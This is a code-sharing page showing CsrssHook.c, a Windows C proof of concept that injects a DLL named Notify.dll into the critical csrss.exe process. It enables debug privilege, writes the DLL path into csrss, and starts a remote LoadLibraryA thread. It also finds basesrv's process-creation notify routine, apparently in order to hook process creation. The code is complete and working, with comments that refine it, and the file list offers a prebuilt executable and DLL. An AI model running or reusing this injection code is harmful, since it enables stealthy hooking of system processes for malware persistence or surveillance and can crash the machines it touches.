
CsrssHook.c - this upload sample...................


			
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")

LPVOID Addr = NULL;   /* value returned by CsrGetCsrssProcessNotifyRoutine(); main() only prints it */
DWORD CsrssPID = 0;   /* pid of csrss.exe; set by main() from GetCsrssProcessId(), read by CheckDLL() */

/* Helpers. Those that detect a failure print " Failed! ..." and exit(1) rather than return an error. */
VOID CheckDLL(VOID);                              /* exit(1) if Notify.DLL is already loaded in CsrssPID */
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID);     /* NULL when basesrv/export/pattern is not found */
VOID GetDebugPrivilege(VOID);                     /* enables SeDebugPrivilege through ntdll!RtlAdjustPrivilege */
DWORD GetCsrssProcessId(VOID);                    /* exit(1) if no csrss.exe can be found */
VOID MakeDirectoryPathFromPath(LPSTR Path);       /* truncates Path in place at its last backslash */

/*
 * Partial SYSTEM_PROCESS_INFORMATION layout, mirroring the reserved-field
 * declaration published in winternl.h. Only two members are read by this
 * file: NextEntryOffset (to walk the list returned by ZwQuerySystemInformation)
 * and UniqueProcessId (the pid, carried in a HANDLE-sized field). Everything
 * named Reserved* is opaque padding that keeps those two at the right offset.
 */
typedef struct _SYSTEM_PROCESS_INFORMATION {

    ULONG NextEntryOffset;          /* bytes to the next entry; 0 marks the last entry of the list */
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;         /* process id, stored as a HANDLE; convert via ULONG_PTR, not DWORD */
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];

} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

/* ntdll!ZwQuerySystemInformation(SystemInformationClass, Buffer, Length, ReturnLength), resolved at runtime by GetCsrssProcessId(). */
typedef LONG (WINAPI *QUERYPROC)(LONG,PVOID,ULONG,PULONG);

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004L   /* NTSTATUS: buffer too small; ReturnLength may say how much is needed */
#define SystemProcessesAndThreadsInformation 5    /* SystemProcessInformation class: yields the SYSTEM_PROCESS_INFORMATION list */

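/*
 * Program entry point of the csrss.exe DLL-injection PoC.
 *
 * Steps: read the BaseSrvCreateProcessNotify slot address through
 * CsrGetCsrssProcessNotifyRoutine() (it is only printed; nothing below hands
 * it to the injected DLL), enable SeDebugPrivilege, find csrss.exe, refuse if
 * Notify.DLL is already loaded there, then load "<exe directory>\Notify.DLL"
 * into csrss with CreateRemoteThread(LoadLibraryA, <remote path string>).
 *
 * Returns 0 on success and 1 on failure; argc/argv are unused. The helpers
 * called here exit(1) on their own failures.
 *
 * Fixes over the original: the pointer is printed with %p, the path build is
 * bounds-checked, any GetFileAttributes failure aborts (not only
 * ERROR_FILE_NOT_FOUND), LoadLibraryA's address is NULL-checked, the remote
 * thread's exit code (LoadLibraryA's result) decides success instead of mere
 * thread completion, the thread handle and remote buffer are released, and
 * csrss is opened with only the rights actually needed.
 *
 * NOTE(review): csrss.exe is a critical system process. A fault inside it —
 * a DllMain that misbehaves, or a remote thread killed mid-LoadLibrary —
 * takes the whole machine down; run this only in a disposable test VM.
 */
int main(int argc, char **argv)
{
	HANDLE hProcess = NULL;
	HANDLE hThread = NULL;
	LPVOID lpStr = NULL;
	LPVOID LoadLibraryAddr = NULL;
	char FileName[MAX_PATH] = { 0 };
	DWORD PathLen = 0;
	SIZE_T WrittenBytes = 0;     /* SIZE_T: what WriteProcessMemory writes through (DWORD is wrong on 64-bit) */
	SIZE_T StrSize = 0;
	DWORD TID = 0;
	DWORD ThreadExit = 0;
	int rc = 1;

	(void) argc;
	(void) argv;

	printf("==============================================\n");
	printf("[+] CSRSS.EXE Hooking PoC Code\n");
	printf("[+] Made By 荐切里捞 (ljm92201@paran.com, startgoora)\n");
	printf("==============================================\n\n");

	Addr = CsrGetCsrssProcessNotifyRoutine();
	if(!Addr)
	{
		printf("[+] Error: Can't found address Notify Routine!? Is WinNT?\n");
		return 1;
	}

	/* Informational only: the address is not used anywhere below. */
	printf("[+] Found Address! %p\n", Addr);

	printf("[+] Enabling debug privilege...");
	GetDebugPrivilege();

	printf("[+] Getting CSRSS.EXE Process Id...");
	CsrssPID = GetCsrssProcessId();

	/* Least privilege: exactly the rights VirtualAllocEx, WriteProcessMemory
	 * and CreateRemoteThread need, instead of PROCESS_ALL_ACCESS. */
	hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
	                       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
	                       FALSE, CsrssPID);
	if(!hProcess)
	{
		printf("[+] OpenProcess() Failed! (GetLastError: %x)\n", (unsigned) GetLastError());
		return 1;
	}

	/* Build "<directory of this executable>\Notify.DLL". Both the
	 * GetModuleFileName result and the room left for the suffix are checked;
	 * the original strcat'd unconditionally into the 260-byte buffer. */
	PathLen = GetModuleFileName(NULL, FileName, MAX_PATH);
	if(PathLen == 0 || PathLen >= MAX_PATH)
	{
		printf("[+] GetModuleFileName() Failed! (GetLastError: %x)\n", (unsigned) GetLastError());
		goto cleanup;
	}
	MakeDirectoryPathFromPath(FileName);
	if(strlen(FileName) + strlen("\\Notify.DLL") >= sizeof(FileName))
	{
		printf("[+] DLL path is too long.\n");
		goto cleanup;
	}
	strcat(FileName, "\\Notify.DLL");

	/* If the DLL cannot be stat'ed for any reason, LoadLibraryA inside
	 * csrss is not going to succeed either, so stop before touching csrss. */
	if(GetFileAttributes(FileName) == INVALID_FILE_ATTRIBUTES)
	{
		printf("[+] Notify.DLL is missing.\n");
		goto cleanup;
	}

	/* Never inject twice; CheckDLL() exits the process if Notify.DLL is there. */
	CheckDLL();

	/* The local LoadLibraryA address is reused in csrss, which assumes
	 * kernel32 is mapped at the same base in both processes. */
	LoadLibraryAddr = (LPVOID) GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "LoadLibraryA");
	if(!LoadLibraryAddr)
	{
		printf("[+] Can't resolve LoadLibraryA.\n");
		goto cleanup;
	}

	/* Remote copy of the DLL path, passed as LoadLibraryA's lpFileName. */
	StrSize = strlen(FileName) + 1;
	lpStr = VirtualAllocEx(hProcess, NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
	if(!lpStr)
	{
		printf("[+] Remote Memory Allocation is failed.\n");
		goto cleanup;
	}

	if(!WriteProcessMemory(hProcess, lpStr, FileName, StrSize, &WrittenBytes) || WrittenBytes != StrSize)
	{
		printf("[+] WriteProcessMemory failed.\n");
		goto cleanup;
	}

	hThread = CreateRemoteThread(hProcess,
					   NULL,
					   0,
					   (LPTHREAD_START_ROUTINE) LoadLibraryAddr,
					   lpStr,
					   0,
					   &TID);
	if(!hThread)
	{
		printf("[+] DLL Injection Failed.\n");
		goto cleanup;
	}

	/* No TerminateThread on timeout (the original did that): killing a
	 * thread inside csrss while it may hold the loader lock can crash the
	 * system. The remote string is also left alone in that case, because
	 * the still-running thread may be reading it. */
	if(WaitForSingleObject(hThread, 3000) != WAIT_OBJECT_0)
	{
		printf("[+] DLL Injection Failed.\n");
		lpStr = NULL;
		goto cleanup;
	}

	/* The thread's exit code is LoadLibraryA's return value (its low 32
	 * bits); 0 means csrss ran the thread but failed to load the DLL. The
	 * original reported success as soon as the thread finished. */
	if(!GetExitCodeThread(hThread, &ThreadExit) || ThreadExit == 0)
	{
		printf("[+] DLL Injection Failed.\n");
		goto cleanup;
	}

	printf("[+] DLL Injection Success.\n");
	rc = 0;

cleanup:
	/* Once LoadLibraryA has returned the remote path string is dead weight. */
	if(lpStr)
		VirtualFreeEx(hProcess, lpStr, 0, MEM_RELEASE);
	if(hThread)
		CloseHandle(hThread);
	CloseHandle(hProcess);
	return rc;
}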

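/*
 * Abort with exit(1) if Notify.DLL is already loaded in csrss.exe, so the
 * DLL is never injected twice. Takes a ToolHelp module snapshot of CsrssPID
 * (set by main() beforehand) and compares each module file name with
 * "notify.dll" case-insensitively.
 *
 * The check stays best-effort as in the original: if no snapshot can be
 * obtained it warns and returns, letting main() carry on, instead of failing
 * silently. Per the CreateToolhelp32Snapshot documentation, TH32CS_SNAPMODULE
 * can transiently fail with ERROR_BAD_LENGTH while the target's module list
 * is changing, so that error is retried a few times first.
 *
 * Note that exit(1) here leaves main()'s csrss handle open; process teardown
 * closes it.
 */
VOID CheckDLL(VOID)
{
	HANDLE hSnapShot = INVALID_HANDLE_VALUE;
	MODULEENTRY32 Module;
	BOOL HaveEntry = FALSE;
	int Attempt = 0;

	for(Attempt = 0; Attempt < 8; Attempt++)
	{
		hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, CsrssPID);
		if(hSnapShot != INVALID_HANDLE_VALUE || GetLastError() != ERROR_BAD_LENGTH)
			break;
	}
	if(hSnapShot == INVALID_HANDLE_VALUE)
	{
		printf("[+] Warning: Can't snapshot CSRSS modules (GetLastError: %x), skipping duplicate check.\n",
		       (unsigned) GetLastError());
		return;
	}

	memset(&Module, 0, sizeof(Module));
	Module.dwSize = sizeof(Module);   /* Module32First rejects the call without it */
	for(HaveEntry = Module32First(hSnapShot, &Module);
	    HaveEntry;
	    HaveEntry = Module32Next(hSnapShot, &Module))
	{
		if(strcmpi(Module.szModule, "notify.dll") == 0)
		{
			printf("[+] ERROR! Already Injected.");
			CloseHandle(hSnapShot);
			exit(1);
		}
	}

	CloseHandle(hSnapShot);
}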

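/*
 * Truncate Path in place at its last backslash, turning
 * "C:\dir\file.exe" into "C:\dir". A path without a backslash is left as
 * is, and NULL is ignored (the original dereferenced it). Only '\\' counts
 * as a separator, matching the original's handling of GetModuleFileName
 * output.
 *
 * Spelled with plain void/char* (the types behind VOID/LPSTR) so the helper
 * is also usable — and testable — outside a windows.h translation unit.
 */
void MakeDirectoryPathFromPath(char *Path)
{
	char *LastSep = NULL;

	if(Path == NULL)
		return;

	/* strrchr is the backwards scan the original wrote by hand. */
	LastSep = strrchr(Path, '\\');
	if(LastSep != NULL)
		*LastSep = '\0';
}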

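/*
 * Find the process id of csrss.exe.
 *
 * Enumerates processes with ntdll!ZwQuerySystemInformation (class 5,
 * SystemProcessInformation), opens each with
 * PROCESS_QUERY_INFORMATION | PROCESS_VM_READ and compares its main-module
 * base name with "csrss.exe" case-insensitively. Prints " Success! (PID: n)"
 * and returns the first match; on any failure prints " Failed! ..." and calls
 * exit(1) (the "return 0" after each exit() only keeps compilers quiet).
 *
 * Fixes over the original: the STATUS_INFO_LENGTH_MISMATCH retry is a loop
 * (the list can grow between the size probe and the real query), the last
 * entry (NextEntryOffset == 0) is no longer skipped, the buffer and probe
 * handle are released on the success path, and the HANDLE-typed pid is
 * converted through ULONG_PTR rather than being cast straight to DWORD and
 * printed with %d.
 *
 * NOTE(review): there is normally one csrss.exe per session, so on a
 * multi-session host this returns whichever appears first in the list and
 * can be opened from here; which one the PoC wants is not specified.
 */
DWORD GetCsrssProcessId(VOID)
{
	HMODULE hNtDLL = NULL;
	QUERYPROC QueryProc = NULL;
	LPVOID Buffer = NULL;
	LPVOID Grown = NULL;
	PSYSTEM_PROCESS_INFORMATION Entry = NULL;
	DWORD Size = 0;
	DWORD Needed = 0;
	LONG status = 0;
	CHAR ModuleName[255] = { 0 };
	int Attempt = 0;

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	if(hNtDLL)
		QueryProc = (QUERYPROC) GetProcAddress(hNtDLL, "ZwQuerySystemInformation");
	if(!QueryProc)
	{
		printf(" Failed! ZwQuerySystemInformation is not supported.\n");
		exit(1); return 0;
	}

	Size = sizeof(SYSTEM_PROCESS_INFORMATION);
	Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size);
	if(!Buffer)
	{
		printf(" Failed! Memory Allocation is failed.\n");
		exit(1); return 0;
	}

	/* Grow until the call stops reporting STATUS_INFO_LENGTH_MISMATCH. The
	 * original retried exactly once with the reported size, which fails if a
	 * process starts in between; it also had a grow-by-one-struct path for a
	 * reported size of 0, kept here as the doubling fallback. Bounded so a
	 * pathological system cannot spin forever. */
	for(Attempt = 0; Attempt < 32; Attempt++)
	{
		Needed = 0;
		status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Size, &Needed);
		if(status != STATUS_INFO_LENGTH_MISMATCH)
			break;

		Size = (Needed > Size) ? Needed + 4096 : Size * 2;
		Grown = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Size);
		if(!Grown)
		{
			HeapFree(GetProcessHeap(), 0, Buffer);
			printf(" Failed! Memory Reallocation is failed.\n");
			exit(1); return 0;
		}
		Buffer = Grown;
	}

	if(status)
	{
		HeapFree(GetProcessHeap(), 0, Buffer);
		printf(" Failed! ZwQuerySystemInformation failed in unknown reason (NTSTATUS %08lX)\n", (unsigned long) status);
		exit(1); return 0;
	}

	/* Walk the variable-length list in place. The final entry is the one
	 * whose NextEntryOffset is 0 and it still has to be examined. */
	Entry = (PSYSTEM_PROCESS_INFORMATION) Buffer;
	for(;;)
	{
		DWORD Pid = (DWORD)(ULONG_PTR) Entry->UniqueProcessId;
		HANDLE ProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, Pid);

		if(ProcessHandle)
		{
			BOOL Match = FALSE;

			memset(ModuleName, 0, sizeof(ModuleName));
			/* sizeof - 1 keeps a NUL slot even if the name fills the buffer. */
			GetModuleBaseName(ProcessHandle, NULL, ModuleName, (DWORD) sizeof(ModuleName) - 1);
			Match = (strcmpi(ModuleName, "csrss.exe") == 0);
			CloseHandle(ProcessHandle);

			if(Match)
			{
				HeapFree(GetProcessHeap(), 0, Buffer);
				printf(" Success! (PID: %d)\n", (int) Pid);
				return Pid;
			}
		}

		if(Entry->NextEntryOffset == 0)
			break;
		Entry = (PSYSTEM_PROCESS_INFORMATION)((PCHAR) Entry + Entry->NextEntryOffset);
	}

	HeapFree(GetProcessHeap(), 0, Buffer);
	printf(" Failed! CSRSS.exe is missing.\n");
	exit(1);
	return 0;
}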

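#ifndef SE_DEBUG_PRIVILEGE
#define SE_DEBUG_PRIVILEGE (20L)   /* LUID value of SeDebugPrivilege, as defined in winnt.h */
#endif

/*
 * Enable SeDebugPrivilege in this process's token through the undocumented
 * ntdll!RtlAdjustPrivilege(Privilege, Enable, CurrentThread, WasEnabled).
 *
 * Prints " Success" when the privilege is enabled. On failure prints
 * " Failed! ..." and exit(1)s — including when RtlAdjustPrivilege itself
 * returns a non-zero NTSTATUS, which is what happens when the token does not
 * hold the privilege (e.g. not running as an administrator). The original
 * discarded that return value and reported success regardless, leaving the
 * later OpenProcess(csrss) to fail with a less informative error.
 *
 * The function pointer is declared with BOOLEAN/PBOOLEAN, the conventionally
 * documented parameter types, instead of BOOL/LPDWORD; the magic 20 is
 * replaced by SE_DEBUG_PRIVILEGE.
 */
VOID GetDebugPrivilege(VOID)
{
	typedef LONG (WINAPI *ADJUSTPRIVPROC)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
	HMODULE hNtDLL = NULL;
	ADJUSTPRIVPROC AdjustPrivilege = NULL;
	BOOLEAN WasEnabled = FALSE;
	LONG status = 0;

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	if(!hNtDLL)
	{
		printf(" Failed! Is WinNT?\n");
		exit(1); return;
	}

	AdjustPrivilege = (ADJUSTPRIVPROC) GetProcAddress(hNtDLL, "RtlAdjustPrivilege");
	if(!AdjustPrivilege)
	{
		printf(" Failed! RtlAdjustPrivilege is not supported.\n");
		exit(1); return;
	}

	/* Enable = TRUE, CurrentThread = FALSE (adjust the process token). */
	status = AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &WasEnabled);
	if(status != 0)
	{
		printf(" Failed! RtlAdjustPrivilege returned NTSTATUS %08lX (not running as Administrator?)\n",
		       (unsigned long) status);
		exit(1); return;
	}

	printf(" Success\n");
}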

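/*
 * Locate the global that basesrv!BaseSetProcessCreateNotify stores its
 * argument into (the process-creation notify routine pointer).
 *
 * Loads BASESRV.DLL into this process if it is not already mapped, resolves
 * the BaseSetProcessCreateNotify export and scans its first 64 bytes for the
 * opcode 0xA3 (MOV DWORD PTR [imm32], EAX); the 4-byte operand that follows
 * is the global's address. Returns NULL when the DLL, the export or the
 * pattern is not found.
 *
 * The pattern is the 32-bit x86 encoding and the operand read is
 * sizeof(LPVOID) bytes, so a 64-bit build would scan a different instruction
 * stream and read a wrong-sized operand; such builds now get NULL instead of
 * garbage (the original had no such guard). The operand is copied with
 * memcpy because it is not aligned, and the scan stops early enough that the
 * read stays inside the 64-byte window.
 *
 * NOTE(review): this is a naive byte scan — the first 0xA3 could be part of
 * another instruction's operand rather than an opcode, and the export's
 * prologue is assumed to look the same on the installed Windows build. The
 * address comes from this process's mapping of basesrv.dll and only equals
 * csrss's if basesrv.dll is mapped at the same base there.
 */
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID)
{
	HMODULE hBaseSrv = NULL;
	const unsigned char *Code = NULL;
	LPVOID Target = NULL;
	int i = 0;

	if(sizeof(LPVOID) != 4)
		return NULL;

	hBaseSrv = GetModuleHandle("BASESRV.DLL");
	if(!hBaseSrv)
	{
		hBaseSrv = LoadLibrary("BASESRV.DLL");
		if(!hBaseSrv)
			return NULL;
	}

	Code = (const unsigned char *) GetProcAddress(hBaseSrv, "BaseSetProcessCreateNotify");
	if(!Code)
		return NULL;

	for(i = 0; i + 1 + (int) sizeof(Target) <= 64; i++)
	{
		if(Code[i] == 0xA3)
		{
			memcpy(&Target, Code + i + 1, sizeof(Target));
			return Target;
		}
	}
	return NULL;
}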
			
File list

NameSizeDate
 CsrssHook.exe32.00 kB04-17-08 22:02
 Notify.dll40.00 kB01-18-08 10:03
 CsrssHook.c7.76 kB04-17-08 22:01
 CsrssHook.dsp3.35 kB01-18-08 00:02
 CsrssHook.dsw543.00 B01-18-08 00:02
 CsrssHook.ncb41.00 kB04-17-08 22:02
 CsrssHook.opt52.50 kB04-17-08 22:02
 CsrssHook.plg1.08 kB04-17-08 22:02
 Notify.c1.99 kB01-18-08 10:03
 NotifyDLL.dsp3.99 kB01-18-08 09:48
 NotifyDLL.dsw543.00 B01-18-08 09:33
 NotifyDLL.ncb33.00 kB01-18-08 10:04
 NotifyDLL.opt52.50 kB01-18-08 10:04
 NotifyDLL.plg1.17 kB01-18-08 10:03
...